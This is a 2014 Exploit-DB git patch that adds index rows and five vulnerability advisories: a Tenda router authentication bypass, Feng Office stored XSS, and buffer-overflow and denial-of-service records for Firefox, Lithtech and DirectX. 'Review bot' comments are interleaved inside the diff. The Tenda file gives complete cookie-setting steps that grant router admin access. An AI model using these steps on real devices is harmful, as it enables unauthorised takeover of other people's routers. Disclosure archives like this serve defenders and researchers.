From 98096fa27639894d3b06b2e9291c8e0da8456d4b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 20 Aug 2014 04:39:23 +0000
Subject: [PATCH] Updated 08_20_2014
---
 files.csv | 5 +++++
 platforms/hardware/webapps/34361.txt | 27 +++++++++++++++++++++++++++
 platforms/linux/remote/34358.txt | 15 +++++++++++++++
 platforms/multiple/dos/34360.txt | 7 +++++++
 platforms/php/webapps/34277.txt | 20 ++++++++++++++++++++
 platforms/windows/dos/34355.txt | 7 +++++++
 6 files changed, 81 insertions(+)
 create mode 100755 platforms/hardware/webapps/34361.txt
 create mode 100755 platforms/linux/remote/34358.txt
 create mode 100755 platforms/multiple/dos/34360.txt
 create mode 100755 platforms/php/webapps/34277.txt
 create mode 100755 platforms/windows/dos/34355.txt
diff --git a/files.csv b/files.csv
index e1c0c9315..1ef216449 100755
--- a/files.csv
+++ b/files.csv
@@ -30873,6 +30873,7 @@ id,file,description,date,author,platform,type,port
 34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0
 34273,platforms/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,php,webapps,80
 34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80
+34277,platforms/php/webapps/34277.txt,"Feng Office - Stored XSS",2014-08-06,"Juan Sacco",php,webapps,0
 34278,platforms/linux/dos/34278.txt,"LibTIFF <= 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service Vulnerability",2010-07-12,"Tom Lane",linux,dos,0
 34279,platforms/linux/dos/34279.txt,"LibTIFF <= 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service Vulnerability",2010-06-14,"Tom Lane",linux,dos,0
 34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0
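Review bot: The added row for 34277 credits "Juan Sacco" in the author column, while the advisory file added in this same commit says `Discovered by: Provensec`, so the index and the record disagree on attribution. The row also sets port `0` although rows 34273 and 34275 directly above it, also PHP web applications, use `80`; anyone filtering the index by port will miss this entry. If the individual and the company are in fact related, stating both in the advisory header, e.g. `# Discovered by: Juan Sacco (Provensec)`, would reconcile the two.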
@@ -30941,6 +30942,10 @@ id,file,description,date,author,platform,type,port
 34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0
 34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 beta 'uid' Parameter SQL Injection Vulnerability",2010-07-19,"Dinesh Arora",php,webapps,0
 34354,platforms/php/webapps/34354.txt,"TenderSystem 0.9.5 'main.php' Multiple Local File Include Vulnerabilities",2009-12-14,Packetdeath,php,webapps,0
+34355,platforms/windows/dos/34355.txt,"Microsoft DirectX 8/9 DirectPlay - Multiple Denial Of Service Vulnerabilities",2010-07-18,"Luigi Auriemma",windows,dos,0
 34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 Remote Buffer Overflow Vulnerability",2009-12-12,"Razuel Akaharnath",linux,dos,0
 34357,platforms/php/webapps/34357.txt,"ScriptsEz Ez FAQ Maker 1.0 Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0
+34358,platforms/linux/remote/34358.txt,"Mozilla Firefox and SeaMonkey Plugin Parameters - Buffer Overflow Vulnerability",2010-07-20,J23,linux,remote,0
 34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 Cross Site Request Forgery Vulnerability",2010-07-20,anonymous,windows,dos,0
+34360,platforms/multiple/dos/34360.txt,"Monolith Lithtech Game Engine - Memory Corruption Vulnerability",2010-07-21,"Luigi Auriemma",multiple,dos,0
+34361,platforms/hardware/webapps/34361.txt,"Tenda A5s Router 3.02.05_CN - Authentication Bypass Vulnerability",2014-08-18,zixian,hardware,webapps,80
diff --git a/platforms/hardware/webapps/34361.txt b/platforms/hardware/webapps/34361.txt
new file mode 100755
index 000000000..4b46fcece
--- /dev/null
+++ b/platforms/hardware/webapps/34361.txt
@@ -0,0 +1,27 @@
+-----------------------------------------------------------------------
+ Tenda A5s Router Authentication Bypass Vulnerability
+-----------------------------------------------------------------------
+Author : zixian
+Mail : me@zixian.org
+Date : Aug, 17-2014
+
+Vendor : http://tenda.com.cn/
+Link : http://tenda.com.cn/Catalog/Product/223
+Version : V3.02.05_CN
+CVE : CVE-2014-5246
+
+Exploit & p0c
+_____________
+
+go to
+ http://192.168.2.1/
+
+then set cookie with javascript
+
+ javascript:document.cookie='admin:language=zh-cn'
+
+go to
+ http://192.168.2.1/advance.asp
+
+you are the admin!
+_____________
diff --git a/platforms/linux/remote/34358.txt b/platforms/linux/remote/34358.txt
new file mode 100755
index 000000000..91dbe1980
--- /dev/null
+++ b/platforms/linux/remote/34358.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/41842/info
+
+Mozilla Firefox and SeaMonkey are prone to a buffer-overflow vulnerability.
+
+An attacker can exploit this issue by tricking an unsuspecting victim into viewing a page containing malicious content. A successful exploit will result in the execution of arbitrary attacker-supplied code in the context of the user running the affected application.
+
+This issue is fixed in:
+
+Firefox 3.6.7
+Firefox 3.5.11
+SeaMonkey 2.0.6
+
+NOTE: This issue was previously covered in BID 41824 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-34 Through -47 Multiple Remote Vulnerabilities), but has been assigned its own record to better document it.
+
+http://www.exploit-db.com/sploits/34358.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/34360.txt b/platforms/multiple/dos/34360.txt
new file mode 100755
index 000000000..be5dd6ff3
--- /dev/null
+++ b/platforms/multiple/dos/34360.txt
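Review bot: platforms/hardware/webapps/34361.txt is created with `new file mode 100755` although it is a plain-text advisory, and the same is true of 34358.txt, 34360.txt, 34277.txt and 34355.txt in this commit. files.csv carries the same mode, so this looks like repository convention, but executable bits on untrusted proof-of-concept material are better avoided and `100644` would do. Separately, the record names the affected version and CVE-2014-5246 but gives no fix status or workaround; a line such as `Fix : <fixed firmware version, or "none at publication">` would let a reader judge exposure.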
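Review bot: In platforms/linux/remote/34358.txt the only pointer to the accompanying material is `http://www.exploit-db.com/sploits/34358.zip`, a plain-HTTP link with no checksum, so a reader cannot confirm that the archive they fetch is the one this record describes. Recording a digest next to the link, e.g. `SHA256: <sha256 of 34358.zip>`, would close that gap; 34360.txt and 34355.txt follow the same pattern. The record also lists the fixed releases but no CVE identifier, only the BID and the MFSA range, which makes it harder to match against scanner or patch-management output.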
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41851/info
+
+Monolith Lithtech Game Engine is prone to a memory-corruption vulnerability.
+
+An attacker can exploit this issue to cause a denial-of-service condition, or execute arbitrary code within the context of the affected application. Other attacks may also be possible.
+
+http://www.exploit-db.com/sploits/34360.zip
\ No newline at end of file
diff --git a/platforms/php/webapps/34277.txt b/platforms/php/webapps/34277.txt
new file mode 100755
index 000000000..a26e6c343
--- /dev/null
+++ b/platforms/php/webapps/34277.txt
@@ -0,0 +1,20 @@
+# Affected software: Feng Office - URL: http://www.fengoffice.com/web/demo.php
+# Discovered by: Provensec
+# Website: http://www.provensec.com
+# Type of vulnerability: XSS Stored
+#
+# Feng Office is a Collaboration tool that includes a CRM, Communication,
+Document Management, Tasks, E-mails, Documents, Internal messages, Time
+tracking,
+Billing, Calendar, Gantt Charts, Reminders, and more.
+#
+# Description: Feng Office is prone to a Persistent Cross Site Scripting
+attack that allows a malicious user to inject HTML or scripts that can
+access any cookies, session tokens, or other
+sensitive information retained by your browser and used with that site.
+# Proof of concept:
+# 1. Create or Edit a client
+# 2. Complete the field Name ( customer[name] ) using this value:
+">
+# 3. Save changes.
+# 4. Share your client in the Activity feed to infect others.
\ No newline at end of file
diff --git a/platforms/windows/dos/34355.txt b/platforms/windows/dos/34355.txt
new file mode 100755
index 000000000..29b9deb4e
--- /dev/null
+++ b/platforms/windows/dos/34355.txt
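Review bot: platforms/php/webapps/34277.txt never states which Feng Office version is affected, so the record cannot be used to decide whether a given installation is exposed; a header line like `# Affected version: <version tested>` is needed. Step 2 gives the field value as just `">`, which looks truncated (possibly markup stripped during import), so a vendor fix cannot be verified against the record as written. The wrapped continuation lines (`Document Management, …`, `attack that allows …`) also drop the leading `#` that every other line in the file uses.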
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41794/info
+
+Microsoft DirectX is prone to multiple denial-of-service vulnerabilities.
+
+An attacker can exploit these issues to interrupt existing sessions or crash or freeze the application that uses DirectX, resulting in denial-of-service conditions.
+
+http://www.exploit-db.com/sploits/34355.zip
\ No newline at end of file